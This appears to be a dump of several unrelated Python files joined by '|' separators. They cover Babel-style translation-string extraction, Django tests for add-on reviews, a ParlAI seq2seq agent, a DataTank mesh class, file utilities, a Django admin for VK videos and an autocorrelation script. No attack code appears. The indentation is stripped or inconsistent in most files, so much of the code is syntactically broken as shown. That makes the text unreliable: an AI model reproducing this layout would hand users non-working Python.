def extract_from_dir(dirname=os.getcwd(), method_map=DEFAULT_MAPPING,
options_map=None, keywords=DEFAULT_KEYWORDS,
comment_tags=(), callback=None, strip_comment_tags=False):
"""Extract messages from any source files found in the given directory.
This function generates tuples of the form:
``(filename, lineno, message, comments)``
Which extraction method is used per file is determined by the `method_map`
parameter, which maps extended glob patterns to extraction method names.
For example, the following is the default mapping:
>>> method_map = [
... ('**.py', 'python')
... ]
This basically says that files with the filename extension ".py" at any
level inside the directory should be processed by the "python" extraction
method. Files that don't match any of the mapping patterns are ignored. See
the documentation of the `pathmatch` function for details on the pattern
syntax.
The following extended mapping would also use the "genshi" extraction
method on any file in "templates" subdirectory:
>>> method_map = [
... ('**/templates/**.*', 'genshi'),
... ('**.py', 'python')
... ]
The dictionary provided by the optional `options_map` parameter augments
these mappings. It uses extended glob patterns as keys, and the values are
dictionaries mapping options names to option values (both strings).
The glob patterns of the `options_map` do not necessarily need to be the
same as those used in the method mapping. For example, while all files in
    the ``templates`` folders in an application may be Genshi templates, the
options for those files may differ based on extension:
>>> options_map = {
... '**/templates/**.txt': {
... 'template_class': 'genshi.template:TextTemplate',
... 'encoding': 'latin-1'
... },
... '**/templates/**.html': {
... 'include_attrs': ''
... }
... }
:param dirname: the path to the directory to extract messages from
:param method_map: a list of ``(pattern, method)`` tuples that maps of
extraction method names to extended glob patterns
:param options_map: a dictionary of additional options (optional)
:param keywords: a dictionary mapping keywords (i.e. names of functions
that should be recognized as translation functions) to
tuples that specify which of their arguments contain
localizable strings
:param comment_tags: a list of tags of translator comments to search for
and include in the results
    :param callback: a function that is called for every file that messages are
extracted from, just before the extraction itself is
performed; the function is passed the filename, the name
                     of the extraction method and the options dictionary as
positional arguments, in that order
:param strip_comment_tags: a flag that if set to `True` causes all comment
tags to be removed from the collected comments.
    :return: an iterator over ``(filename, lineno, message, comments)`` tuples
:rtype: ``iterator``
:see: `pathmatch`
"""
if options_map is None:
options_map = {}
absname = os.path.abspath(dirname)
for root, dirnames, filenames in os.walk(absname):
for subdir in dirnames:
if subdir.startswith('.') or subdir.startswith('_'):
dirnames.remove(subdir)
dirnames.sort()
filenames.sort()
for filename in filenames:
filename = relpath(
os.path.join(root, filename).replace(os.sep, '/'),
dirname
)
for pattern, method in method_map:
if pathmatch(pattern, filename):
filepath = os.path.join(absname, filename)
options = {}
for opattern, odict in options_map.items():
if pathmatch(opattern, filename):
options = odict
if callback:
callback(filename, method, options)
for lineno, message, comments in \
extract_from_file(method, filepath,
keywords=keywords,
comment_tags=comment_tags,
options=options,
strip_comment_tags=
strip_comment_tags):
yield filename, lineno, message, comments
break
def extract_from_file(method, filename, keywords=DEFAULT_KEYWORDS,
comment_tags=(), options=None, strip_comment_tags=False):
"""Extract messages from a specific file.
This function returns a list of tuples of the form:
    ``(lineno, message, comments)``
:param filename: the path to the file to extract messages from
    :param method: a string specifying the extraction method (e.g. "python")
:param keywords: a dictionary mapping keywords (i.e. names of functions
that should be recognized as translation functions) to
tuples that specify which of their arguments contain
localizable strings
:param comment_tags: a list of translator tags to search for and include
in the results
:param strip_comment_tags: a flag that if set to `True` causes all comment
tags to be removed from the collected comments.
:param options: a dictionary of additional options (optional)
:return: the list of extracted messages
:rtype: `list`
"""
fileobj = open(filename, 'U')
try:
return list(extract(method, fileobj, keywords, comment_tags, options,
strip_comment_tags))
finally:
fileobj.close()
def extract(method, fileobj, keywords=DEFAULT_KEYWORDS, comment_tags=(),
options=None, strip_comment_tags=False):
"""Extract messages from the given file-like object using the specified
extraction method.
This function returns a list of tuples of the form:
``(lineno, message, comments)``
The implementation dispatches the actual extraction to plugins, based on the
value of the ``method`` parameter.
>>> source = '''# foo module
... def run(argv):
... print _('Hello, world!')
... '''
>>> from StringIO import StringIO
>>> for message in extract('python', StringIO(source)):
... print message
(3, u'Hello, world!', [])
    :param method: a string specifying the extraction method (e.g. "python");
if this is a simple name, the extraction function will be
looked up by entry point; if it is an explicit reference
to a function (of the form ``package.module:funcname`` or
``package.module.funcname``), the corresponding function
will be imported and used
:param fileobj: the file-like object the messages should be extracted from
:param keywords: a dictionary mapping keywords (i.e. names of functions
that should be recognized as translation functions) to
tuples that specify which of their arguments contain
localizable strings
:param comment_tags: a list of translator tags to search for and include
in the results
:param options: a dictionary of additional options (optional)
:param strip_comment_tags: a flag that if set to `True` causes all comment
tags to be removed from the collected comments.
:return: the list of extracted messages
:rtype: `list`
:raise ValueError: if the extraction method is not registered
"""
func = None
if ':' in method or '.' in method:
if ':' not in method:
lastdot = method.rfind('.')
module, attrname = method[:lastdot], method[lastdot + 1:]
else:
module, attrname = method.split(':', 1)
func = getattr(__import__(module, {}, {}, [attrname]), attrname)
else:
try:
from pkg_resources import working_set
except ImportError:
# pkg_resources is not available, so we resort to looking up the
# builtin extractors directly
builtin = {'ignore': extract_nothing, 'python': extract_python}
func = builtin.get(method)
else:
for entry_point in working_set.iter_entry_points(GROUP_NAME,
method):
func = entry_point.load(require=True)
break
if func is None:
raise ValueError('Unknown extraction method %r' % method)
results = func(fileobj, keywords.keys(), comment_tags,
options=options or {})
for lineno, funcname, messages, comments in results:
if funcname:
spec = keywords[funcname] or (1,)
else:
spec = (1,)
if not isinstance(messages, (list, tuple)):
messages = [messages]
if not messages:
continue
# Validate the messages against the keyword's specification
msgs = []
invalid = False
# last_index is 1 based like the keyword spec
last_index = len(messages)
for index in spec:
if last_index < index:
# Not enough arguments
invalid = True
break
message = messages[index - 1]
if message is None:
invalid = True
break
msgs.append(message)
if invalid:
continue
first_msg_index = spec[0] - 1
if not messages[first_msg_index]:
# An empty string msgid isn't valid, emit a warning
where = '%s:%i' % (hasattr(fileobj, 'name') and \
fileobj.name or '(unknown)', lineno)
print >> sys.stderr, empty_msgid_warning % where
continue
messages = tuple(msgs)
if len(messages) == 1:
messages = messages[0]
if strip_comment_tags:
_strip_comment_tags(comments, comment_tags)
yield lineno, messages, comments
def extract_nothing(fileobj, keywords, comment_tags, options):
"""Pseudo extractor that does not actually extract anything, but simply
returns an empty list.
"""
return []
def extract_python(fileobj, keywords, comment_tags, options):
"""Extract messages from Python source code.
:param fileobj: the seekable, file-like object the messages should be
extracted from
:param keywords: a list of keywords (i.e. function names) that should be
recognized as translation functions
:param comment_tags: a list of translator tags to search for and include
in the results
:param options: a dictionary of additional options (optional)
:return: an iterator over ``(lineno, funcname, message, comments)`` tuples
:rtype: ``iterator``
"""
funcname = lineno = message_lineno = None
call_stack = -1
buf = []
messages = []
translator_comments = []
in_def = in_translator_comments = False
comment_tag = None
encoding = parse_encoding(fileobj) or options.get('encoding', 'iso-8859-1')
tokens = generate_tokens(fileobj.readline)
for tok, value, (lineno, _), _, _ in tokens:
if call_stack == -1 and tok == NAME and value in ('def', 'class'):
in_def = True
elif tok == OP and value == '(':
if in_def:
# Avoid false positives for declarations such as:
# def gettext(arg='message'):
in_def = False
continue
if funcname:
message_lineno = lineno
call_stack += 1
elif in_def and tok == OP and value == ':':
# End of a class definition without parens
in_def = False
continue
elif call_stack == -1 and tok == COMMENT:
# Strip the comment token from the line
value = value.decode(encoding)[1:].strip()
if in_translator_comments and \
translator_comments[-1][0] == lineno - 1:
# We're already inside a translator comment, continue appending
translator_comments.append((lineno, value))
continue
# If execution reaches this point, let's see if comment line
# starts with one of the comment tags
for comment_tag in comment_tags:
if value.startswith(comment_tag):
in_translator_comments = True
translator_comments.append((lineno, value))
break
elif funcname and call_stack == 0:
if tok == OP and value == ')':
if buf:
messages.append(''.join(buf))
del buf[:]
else:
messages.append(None)
if len(messages) > 1:
messages = tuple(messages)
else:
messages = messages[0]
                # Comments don't apply unless they immediately precede the
# message
if translator_comments and \
translator_comments[-1][0] < message_lineno - 1:
translator_comments = []
yield (message_lineno, funcname, messages,
[comment[1] for comment in translator_comments])
funcname = lineno = message_lineno = None
call_stack = -1
messages = []
translator_comments = []
in_translator_comments = False
elif tok == STRING:
# Unwrap quotes in a safe manner, maintaining the string's
# encoding
# https://sourceforge.net/tracker/?func=detail&atid=355470&
# aid=617979&group_id=5470
value = eval('# coding=%s\n%s' % (encoding, value),
{'__builtins__':{}}, {})
if isinstance(value, str):
value = value.decode(encoding)
buf.append(value)
elif tok == OP and value == ',':
if buf:
messages.append(''.join(buf))
del buf[:]
else:
messages.append(None)
if translator_comments:
# We have translator comments, and since we're on a
# comma(,) user is allowed to break into a new line
# Let's increase the last comment's lineno in order
# for the comment to still be a valid one
old_lineno, old_comment = translator_comments.pop()
translator_comments.append((old_lineno+1, old_comment))
elif call_stack > 0 and tok == OP and value == ')':
call_stack -= 1
elif funcname and call_stack == -1:
funcname = None
elif tok == NAME and value in keywords:
funcname = value
def extract_javascript(fileobj, keywords, comment_tags, options):
"""Extract messages from JavaScript source code.
:param fileobj: the seekable, file-like object the messages should be
extracted from
:param keywords: a list of keywords (i.e. function names) that should be
recognized as translation functions
:param comment_tags: a list of translator tags to search for and include
in the results
:param options: a dictionary of additional options (optional)
:return: an iterator over ``(lineno, funcname, message, comments)`` tuples
:rtype: ``iterator``
"""
from babel.messages.jslexer import tokenize, unquote_string
funcname = message_lineno = None
messages = []
last_argument = None
translator_comments = []
concatenate_next = False
encoding = options.get('encoding', 'utf-8')
last_token = None
call_stack = -1
for token in tokenize(fileobj.read().decode(encoding)):
if token.type == 'operator' and token.value == '(':
if funcname:
message_lineno = token.lineno
call_stack += 1
elif call_stack == -1 and token.type == 'linecomment':
value = token.value[2:].strip()
if translator_comments and \
translator_comments[-1][0] == token.lineno - 1:
translator_comments.append((token.lineno, value))
continue
for comment_tag in comment_tags:
if value.startswith(comment_tag):
translator_comments.append((token.lineno, value.strip()))
break
elif token.type == 'multilinecomment':
            # only one multi-line comment may precede a translation
translator_comments = []
value = token.value[2:-2].strip()
for comment_tag in comment_tags:
if value.startswith(comment_tag):
lines = value.splitlines()
if lines:
lines[0] = lines[0].strip()
lines[1:] = dedent('\n'.join(lines[1:])).splitlines()
for offset, line in enumerate(lines):
translator_comments.append((token.lineno + offset,
line))
break
elif funcname and call_stack == 0:
if token.type == 'operator' and token.value == ')':
if last_argument is not None:
messages.append(last_argument)
if len(messages) > 1:
messages = tuple(messages)
elif messages:
messages = messages[0]
else:
messages = None
# Comments don't apply unless they immediately precede the
# message
if translator_comments and \
translator_comments[-1][0] < message_lineno - 1:
translator_comments = []
if messages is not None:
yield (message_lineno, funcname, messages,
[comment[1] for comment in translator_comments])
funcname = message_lineno = last_argument = None
concatenate_next = False
translator_comments = []
messages = []
call_stack = -1
elif token.type == 'string':
new_value = unquote_string(token.value)
if concatenate_next:
last_argument = (last_argument or '') + new_value
concatenate_next = False
else:
last_argument = new_value
elif token.type == 'operator':
if token.value == ',':
if last_argument is not None:
messages.append(last_argument)
last_argument = None
else:
messages.append(None)
concatenate_next = False
elif token.value == '+':
concatenate_next = True
elif call_stack > 0 and token.type == 'operator' \
and token.value == ')':
call_stack -= 1
elif funcname and call_stack == -1:
funcname = None
elif call_stack == -1 and token.type == 'name' and \
token.value in keywords and \
(last_token is None or last_token.type != 'name' or
last_token.value != 'function'):
funcname = token.value
last_token = token
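# Hedged end-to-end sketch: extracting messages from a source tree using the default
# Python-only mapping (the directory name is hypothetical):
#
#   mapping = [('**.py', 'python')]
#   for filename, lineno, message, comments in extract_from_dir('myproject', mapping):
#       print filename, lineno, message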
|
from django.utils import translation
from nose.tools import eq_
from olympia import amo
from olympia.amo.tests import TestCase, ESTestCase
from olympia.addons.models import Addon
from olympia.reviews import tasks
from olympia.reviews.models import (
check_spam, GroupedRating, Review, ReviewFlag, Spam)
from olympia.users.models import UserProfile
class TestReviewModel(TestCase):
fixtures = ['reviews/test_models']
def test_translations(self):
translation.activate('en-US')
# There's en-US and de translations. We should get en-US.
r1 = Review.objects.get(id=1)
self.trans_eq(r1.title, 'r1 title en', 'en-US')
# There's only a de translation, so we get that.
r2 = Review.objects.get(id=2)
self.trans_eq(r2.title, 'r2 title de', 'de')
translation.activate('de')
# en and de exist, we get de.
r1 = Review.objects.get(id=1)
self.trans_eq(r1.title, 'r1 title de', 'de')
# There's only a de translation, so we get that.
r2 = Review.objects.get(id=2)
self.trans_eq(r2.title, 'r2 title de', 'de')
def test_soft_delete(self):
eq_(Review.objects.count(), 2)
eq_(Review.unfiltered.count(), 2)
Review.objects.get(id=1).delete()
eq_(Review.objects.count(), 1)
eq_(Review.unfiltered.count(), 2)
Review.objects.filter(id=2).delete()
eq_(Review.objects.count(), 0)
eq_(Review.unfiltered.count(), 2)
def test_filter_for_many_to_many(self):
# Check https://bugzilla.mozilla.org/show_bug.cgi?id=1142035.
review = Review.objects.get(id=1)
addon = review.addon
assert review in addon._reviews.all()
# Delete the review: it shouldn't be listed anymore.
review.update(deleted=True)
addon = Addon.objects.get(pk=addon.pk)
assert review not in addon._reviews.all()
def test_no_filter_for_relations(self):
# Check https://bugzilla.mozilla.org/show_bug.cgi?id=1142035.
review = Review.objects.get(id=1)
flag = ReviewFlag.objects.create(review=review,
flag='review_flag_reason_spam')
assert flag.review == review
# Delete the review: reviewflag.review should still work.
review.update(deleted=True)
flag = ReviewFlag.objects.get(pk=flag.pk)
assert flag.review == review
class TestGroupedRating(TestCase):
fixtures = ['reviews/dev-reply']
grouped_ratings = [(1, 0), (2, 0), (3, 0), (4, 1), (5, 0)]
def test_get_none(self):
eq_(GroupedRating.get(3, update_none=False), None)
def test_set(self):
eq_(GroupedRating.get(1865, update_none=False), None)
GroupedRating.set(1865)
eq_(GroupedRating.get(1865, update_none=False), self.grouped_ratings)
def test_cron(self):
eq_(GroupedRating.get(1865, update_none=False), None)
tasks.addon_grouped_rating(1865)
eq_(GroupedRating.get(1865, update_none=False), self.grouped_ratings)
def test_update_none(self):
eq_(GroupedRating.get(1865, update_none=False), None)
eq_(GroupedRating.get(1865, update_none=True), self.grouped_ratings)
class TestSpamTest(TestCase):
fixtures = ['reviews/test_models']
def test_create_not_there(self):
Review.objects.all().delete()
eq_(Review.objects.count(), 0)
check_spam(1)
def test_add(self):
assert Spam().add(Review.objects.all()[0], 'numbers')
class TestRefreshTest(ESTestCase):
fixtures = ['base/users']
def setUp(self):
super(TestRefreshTest, self).setUp()
self.addon = Addon.objects.create(type=amo.ADDON_EXTENSION)
self.user = UserProfile.objects.all()[0]
self.refresh()
eq_(self.get_bayesian_rating(), 0.0)
def get_bayesian_rating(self):
q = Addon.search().filter(id=self.addon.id)
return list(q.values_dict('bayesian_rating'))[0]['bayesian_rating'][0]
def test_created(self):
eq_(self.get_bayesian_rating(), 0.0)
Review.objects.create(addon=self.addon, user=self.user, rating=4)
self.refresh()
eq_(self.get_bayesian_rating(), 4.0)
def test_edited(self):
self.test_created()
r = self.addon.reviews.all()[0]
r.rating = 1
r.save()
self.refresh()
eq_(self.get_bayesian_rating(), 2.5)
def test_deleted(self):
self.test_created()
r = self.addon.reviews.all()[0]
r.delete()
self.refresh()
eq_(self.get_bayesian_rating(), 0.0)
|
from parlai.core.agents import Agent
from torch.autograd import Variable
from torch import optim
import torch.nn as nn
import torch
import copy
import random
class Seq2seqAgent(Agent):
"""Simple agent which uses an LSTM to process incoming text observations."""
@staticmethod
def add_cmdline_args(argparser):
argparser.add_arg('-hs', '--hiddensize', type=int, default=64,
help='size of the hidden layers and embeddings')
argparser.add_arg('-nl', '--numlayers', type=int, default=2,
help='number of hidden layers')
argparser.add_arg('-lr', '--learningrate', type=float, default=0.5,
help='learning rate')
argparser.add_arg('-dr', '--dropout', type=float, default=0.1,
help='dropout rate')
argparser.add_arg('--no-cuda', action='store_true', default=False,
help='disable GPUs even if available')
argparser.add_arg('--gpu', type=int, default=-1,
help='which GPU device to use')
def __init__(self, opt, shared=None):
super().__init__(opt, shared)
if shared and 'dictionary' in shared:
# only set up everything for the main instance
self.dict = shared['dictionary']
self.EOS = self.dict.eos_token
self.EOS_TENSOR = torch.LongTensor(self.dict.parse(self.EOS))
self.id = 'Seq2Seq'
hsz = opt['hiddensize']
self.hidden_size = hsz
self.num_layers = opt['numlayers']
self.learning_rate = opt['learningrate']
self.use_cuda = opt.get('cuda', False)
self.longest_label = 2 # TODO: 1
            self.babi_mode = 'babi' in opt['task']
            if self.babi_mode:
                self.dirs = set(['n', 's', 'e', 'w'])
self.criterion = nn.NLLLoss()
self.lt = nn.Embedding(len(self.dict), hsz, padding_idx=0,
scale_grad_by_freq=True)
self.encoder = nn.GRU(hsz, hsz, opt['numlayers'])
self.decoder = nn.GRU(hsz, hsz, opt['numlayers'])
self.d2o = nn.Linear(hsz, len(self.dict))
self.dropout = nn.Dropout(opt['dropout'])
self.softmax = nn.LogSoftmax()
lr = opt['learningrate']
self.optims = {
'lt': optim.SGD(self.lt.parameters(), lr=lr),
'encoder': optim.SGD(self.encoder.parameters(), lr=lr),
'decoder': optim.SGD(self.decoder.parameters(), lr=lr),
'd2o': optim.SGD(self.d2o.parameters(), lr=lr),
}
if self.use_cuda:
self.cuda()
self.episode_done = True
def parse(self, text):
return torch.LongTensor(self.dict.txt2vec(text))
def v2t(self, vec):
return self.dict.vec2txt(vec)
def cuda(self):
self.criterion.cuda()
self.lt.cuda()
self.encoder.cuda()
self.decoder.cuda()
self.d2o.cuda()
self.dropout.cuda()
self.softmax.cuda()
def hidden_to_idx(self, hidden, drop=False):
if hidden.size(0) > 1:
raise RuntimeError('bad dimensions of tensor:', hidden)
hidden = hidden.squeeze(0)
scores = self.d2o(hidden)
if drop:
scores = self.dropout(scores)
scores = self.softmax(scores)
_max_score, idx = scores.max(1)
return idx, scores
def zero_grad(self):
for optimizer in self.optims.values():
optimizer.zero_grad()
def update_params(self):
for optimizer in self.optims.values():
optimizer.step()
def init_zeros(self, bsz=1):
t = torch.zeros(self.num_layers, bsz, self.hidden_size)
if self.use_cuda:
t = t.cuda(async=True)
return Variable(t)
def init_rand(self, bsz=1):
t = torch.FloatTensor(self.num_layers, bsz, self.hidden_size)
t.uniform_(0.05)
if self.use_cuda:
t = t.cuda(async=True)
return Variable(t)
def observe(self, observation):
observation = copy.deepcopy(observation)
if not self.episode_done:
# if the last example wasn't the end of an episode, then we need to
# recall what was said in that example
prev_dialogue = self.observation['text']
observation['text'] = prev_dialogue + '\n' + observation['text']
self.observation = observation
self.episode_done = observation['episode_done']
return observation
def update(self, xs, ys):
batchsize = len(xs)
# first encode context
xes = self.lt(xs).t()
h0 = self.init_zeros(batchsize)
_output, hn = self.encoder(xes, h0)
# start with EOS tensor for all
x = self.EOS_TENSOR
if self.use_cuda:
x = x.cuda(async=True)
x = Variable(x)
xe = self.lt(x).unsqueeze(1)
xes = xe.expand(xe.size(0), batchsize, xe.size(2))
output_lines = [[] for _ in range(batchsize)]
self.zero_grad()
# update model
loss = 0
self.longest_label = max(self.longest_label, ys.size(1))
for i in range(ys.size(1)):
output, hn = self.decoder(xes, hn)
preds, scores = self.hidden_to_idx(output, drop=True)
y = ys.select(1, i)
loss += self.criterion(scores, y)
# use the true token as the next input
xes = self.lt(y).unsqueeze(0)
# hn = self.dropout(hn)
for j in range(preds.size(0)):
token = self.v2t([preds.data[j][0]])
output_lines[j].append(token)
loss.backward()
self.update_params()
if random.random() < 0.1:
true = self.v2t(ys.data[0])
print('loss:', round(loss.data[0], 2), ' '.join(output_lines[0]), '(true: {})'.format(true))
return output_lines
def predict(self, xs):
batchsize = len(xs)
# first encode context
xes = self.lt(xs).t()
h0 = self.init_zeros(batchsize)
_output, hn = self.encoder(xes, h0)
# start with EOS tensor for all
x = self.EOS_TENSOR
if self.use_cuda:
x = x.cuda(async=True)
x = Variable(x)
xe = self.lt(x).unsqueeze(1)
xes = xe.expand(xe.size(0), batchsize, xe.size(2))
done = [False for _ in range(batchsize)]
total_done = 0
max_len = 0
output_lines = [[] for _ in range(batchsize)]
        while total_done < batchsize and max_len < self.longest_label:
output, hn = self.decoder(xes, hn)
preds, scores = self.hidden_to_idx(output, drop=False)
xes = self.lt(preds.t())
max_len += 1
for i in range(preds.size(0)):
if not done[i]:
token = self.v2t(preds.data[i])
if token == self.EOS:
done[i] = True
total_done += 1
else:
output_lines[i].append(token)
if self.babi_mode and token not in self.dirs:
# for babi, only output one token except when
# giving directions
done[i] = True
total_done += 1
if random.random() < 0.1:
print('prediction:', ' '.join(output_lines[0]))
return output_lines
def batchify(self, obs):
exs = [ex for ex in obs if 'text' in ex]
valid_inds = [i for i, ex in enumerate(obs) if 'text' in ex]
batchsize = len(exs)
parsed = [self.parse(ex['text']) for ex in exs]
max_x_len = max([len(x) for x in parsed])
xs = torch.LongTensor(batchsize, max_x_len).fill_(0)
for i, x in enumerate(parsed):
offset = max_x_len - len(x)
for j, idx in enumerate(x):
xs[i][j + offset] = idx
if self.use_cuda:
xs = xs.cuda(async=True)
xs = Variable(xs)
ys = None
if 'labels' in exs[0]:
labels = [random.choice(ex['labels']) + ' ' + self.EOS for ex in exs]
parsed = [self.parse(y) for y in labels]
max_y_len = max(len(y) for y in parsed)
ys = torch.LongTensor(batchsize, max_y_len).fill_(0)
for i, y in enumerate(parsed):
for j, idx in enumerate(y):
ys[i][j] = idx
if self.use_cuda:
ys = ys.cuda(async=True)
ys = Variable(ys)
return xs, ys, valid_inds
def batch_act(self, observations):
batchsize = len(observations)
batch_reply = [{'id': self.getID()} for _ in range(batchsize)]
xs, ys, valid_inds = self.batchify(observations)
if len(xs) == 0:
return batch_reply
# Either train or predict
if ys is not None:
predictions = self.update(xs, ys)
else:
predictions = self.predict(xs)
for i in range(len(predictions)):
batch_reply[valid_inds[i]]['text'] = ' '.join(
c for c in predictions[i] if c != self.EOS)
return batch_reply
def act(self):
return self.batch_act([self.observation])[0]
def save(self, path):
model = {}
model['lt'] = self.lt.state_dict()
model['encoder'] = self.encoder.state_dict()
model['decoder'] = self.decoder.state_dict()
model['d2o'] = self.d2o.state_dict()
model['longest_label'] = self.longest_label
with open(path, 'wb') as write:
torch.save(model, write)
def load(self, path):
with open(path, 'rb') as read:
model = torch.load(read)
self.lt.load_state_dict(model['lt'])
self.encoder.load_state_dict(model['encoder'])
self.decoder.load_state_dict(model['decoder'])
self.d2o.load_state_dict(model['d2o'])
self.longest_label = model['longest_label']
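# Usage sketch (illustrative only; the ``opt`` values and the dictionary
# agent are assumptions, not part of this file). The agent expects
# ``shared['dictionary']`` to provide ``eos_token``, ``parse``, ``txt2vec``
# and ``vec2txt``, which in ParlAI normally comes from a DictionaryAgent
# built over the task data:
#
#   opt = {'hiddensize': 64, 'numlayers': 2, 'learningrate': 0.5,
#          'dropout': 0.1, 'cuda': False, 'task': 'babi:task1k:1'}
#   agent = Seq2seqAgent(opt, shared={'dictionary': dictionary_agent})
#   agent.observe({'text': 'hello', 'labels': ['hi'], 'episode_done': True})
#   reply = agent.act()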
|
from datatank_py.DTStructuredGrid2D import DTStructuredGrid2D, _squeeze2d
import numpy as np
class DTStructuredMesh2D(object):
"""2D structured mesh object.
This class corresponds to DataTank's DTStructuredMesh2D.
"""
dt_type = ("2D Structured Mesh",)
"""Type strings allowed by DataTank"""
def __init__(self, values, grid=None):
"""
:param values: 2D array of values
:param grid: DTStructuredGrid2D object (defaults to unit grid) or the name of a previously saved grid
Note that the values array must be ordered as (y, x) for compatibility
with the grid and DataTank.
"""
super(DTStructuredMesh2D, self).__init__()
values = _squeeze2d(values)
shape = np.shape(values)
assert len(shape) == 2, "values array must be 2D"
        if not isinstance(grid, basestring):
            if grid is None:
grid = DTStructuredGrid2D(range(shape[1]), range(shape[0]))
assert shape == grid.shape(), "grid shape %s != value shape %s" % (grid.shape(), shape)
self._grid = grid
self._values = values
def grid(self):
""":returns: a :class:`datatank_py.DTStructuredGrid2D.DTStructuredGrid2D` instance"""
return self._grid
def values(self):
""":returns: a 2D numpy array of values at each grid node"""
return self._values
def __dt_type__(self):
return "2D Structured Mesh"
def __str__(self):
return self.__dt_type__() + ":\n " + str(self._grid) + "\n" + " Values:\n " + str(self._values)
def __dt_write__(self, datafile, name):
datafile.write_anonymous(self._grid, name)
datafile.write_anonymous(self._values, name + "_V")
def write_with_shared_grid(self, datafile, name, grid_name, time, time_index):
"""Allows saving a single grid and sharing it amongst different time
values of a variable.
:param datafile: a :class:`datatank_py.DTDataFile.DTDataFile` open for writing
:param name: the mesh variable's name
:param grid_name: the grid name to be shared (will not be visible in DataTank)
:param time: the time value for this step (DataTank's ``t`` variable)
:param time_index: the corresponding integer index of this time step
This is an advanced technique, but it can give a significant space savings in
a data file. It's not widely implemented, since it's not clear yet if this
is the best API.
"""
if grid_name not in datafile:
datafile.write_anonymous(self._grid, grid_name)
datafile.write_anonymous(self.__dt_type__(), "Seq_" + name)
varname = "%s_%d" % (name, time_index)
datafile.write_anonymous(grid_name, varname)
datafile.write_anonymous(self._values, varname + "_V")
datafile.write_anonymous(np.array((time,)), varname + "_time")
@classmethod
    def from_data_file(cls, datafile, name):
grid = DTStructuredGrid2D.from_data_file(datafile, name)
values = datafile[name + "_V"]
return DTStructuredMesh2D(values, grid=grid)
if __name__ == '__main__':
from DTDataFile import DTDataFile
with DTDataFile("test/structured_mesh2D.dtbin", truncate=True) as df:
xvals = np.exp(np.array(range(18), dtype=np.float) / 5)
yvals = np.exp(np.array(range(20), dtype=np.float) / 5)
grid = DTStructuredGrid2D(xvals, yvals)
values = np.zeros(len(xvals) * len(yvals))
for i in xrange(len(values)):
values[i] = i
# DataTank indexes differently from numpy; the grid is z,y,x ordered
values = values.reshape(grid.shape())
mesh = DTStructuredMesh2D(values, grid=grid)
df["2D mesh"] = mesh
|
x = 1
print(x)
import time
time.sleep(10)
print(x)
|
import errno
import os
import shutil
def mkdir(path, mode=0o777, exist_ok=False):
try:
os.mkdir(path, mode)
except OSError as e:
if not exist_ok or e.errno != errno.EEXIST or not os.path.isdir(path):
raise
def makedirs(path, mode=0o777, exist_ok=False):
try:
os.makedirs(path, mode)
except OSError as e:
if not exist_ok or e.errno != errno.EEXIST or not os.path.isdir(path):
raise
def parent_dir(path):
return os.path.normpath(os.path.join(path, os.pardir))
def existing_parent(path):
while not os.path.exists(path):
path = parent_dir(path)
return path
def remove(path, nonexist_ok=False):
try:
os.remove(path)
except OSError as e:
if not nonexist_ok or e.errno != errno.ENOENT:
raise
def copy(src, dst, recursive=False, symlink='relative', mode=None):
if symlink != 'never' and os.path.islink(src):
link = os.readlink(src)
if symlink == 'always' or not os.path.isabs(link):
remove(dst, nonexist_ok=True)
os.symlink(link, dst)
return
if os.path.isdir(src):
mkdir(dst, exist_ok=True)
if recursive:
for name in os.listdir(src):
copy(os.path.join(src, name), os.path.join(dst, name))
else:
shutil.copyfile(src, dst)
if mode is not None:
os.chmod(dst, mode)
else:
shutil.copymode(src, dst)
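# Minimal usage sketch (illustrative; the paths below are assumptions):
# build a directory tree idempotently and copy a file into it.
if __name__ == '__main__':
    import tempfile
    root = tempfile.mkdtemp()
    makedirs(os.path.join(root, 'a', 'b'), exist_ok=True)
    src = os.path.join(root, 'hello.txt')
    with open(src, 'w') as f:
        f.write('hello\n')
    copy(src, os.path.join(root, 'a', 'b', 'hello.txt'))
    # existing_parent walks up until it finds a path that actually exists
    print(existing_parent(os.path.join(root, 'a', 'missing', 'deeper')))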
|
from django.contrib import admin
from django.core.urlresolvers import reverse
from vkontakte_api.admin import VkontakteModelAdmin
from .models import Album, Video
class VideoInline(admin.TabularInline):
def image(self, instance):
return '<img src="%s" />' % (instance.photo_130,)
image.short_description = 'video'
image.allow_tags = True
model = Video
fields = ('title', 'image', 'owner', 'comments_count', 'views_count')
readonly_fields = fields
extra = False
can_delete = False
class AlbumAdmin(VkontakteModelAdmin):
def image_preview(self, obj):
return u'<a href="%s"><img src="%s" height="30" /></a>' % (obj.photo_160, obj.photo_160)
image_preview.short_description = u'Картинка'
image_preview.allow_tags = True
list_display = ('image_preview', 'remote_id', 'title', 'owner', 'videos_count')
list_display_links = ('title', 'remote_id',)
search_fields = ('title', 'description')
inlines = [VideoInline]
class VideoAdmin(VkontakteModelAdmin):
def image_preview(self, obj):
return u'<a href="%s"><img src="%s" height="30" /></a>' % (obj.photo_130, obj.photo_130)
image_preview.short_description = u'Картинка'
image_preview.allow_tags = True
list_display = ('image_preview', 'remote_id', 'owner', 'album', 'title', 'comments_count', 'views_count', 'date')
list_display_links = ('remote_id', 'title')
list_filter = ('album',)
admin.site.register(Album, AlbumAdmin)
admin.site.register(Video, VideoAdmin)
|
"""
This scripts compares the autocorrelation in statsmodels with
the one that you can build using only correlate.
"""
import numpy as np
import matplotlib.pyplot as plt
import scipy.signal as signal
import statsmodels.api as sm
from signals.time_series_class import MixAr, AR
from signals.aux_functions import sidekick
plot = False
plot2 = True
dt = 0.1
Tmax = 100
amplitude = 1
w1 = 1
w2 = 5
beta = sidekick(w1, w2, dt, Tmax, amplitude)
phi0 = 0.0
phi1 = -0.8
phi2 = 0.3
phi = np.array((phi0, phi1, phi2))
x0 = 1
x1 = 1
x2 = 0
initial_conditions = np.array((x0, x1, x2))
B = AR(phi, dt=dt, Tmax=Tmax)
B.initial_conditions(initial_conditions)
normal_series = B.construct_series()
A = MixAr(phi, dt=dt, Tmax=Tmax, beta=beta)
A.initial_conditions(initial_conditions)
mix_series = A.construct_series()
time = A.time
if plot:
plt.subplot(3, 1, 1)
plt.plot(time, beta)
plt.subplot(3, 1, 2)
plt.plot(time, normal_series)
plt.subplot(3, 1, 3)
plt.plot(time, mix_series)
plt.show()
nlags = 40
normal_series -= normal_series.mean()
var = np.var(normal_series)
n = len(normal_series)
nlags1 = nlags
normalizing = np.arange(n, n - nlags1, -1)
auto_correlation1 = np.correlate(normal_series, normal_series, mode='full')
aux = auto_correlation1.size/2
auto_correlation1 = auto_correlation1[aux:aux + nlags1] / (normalizing * var)
auto_correlation2 = sm.tsa.stattools.acf(normal_series, nlags=nlags)
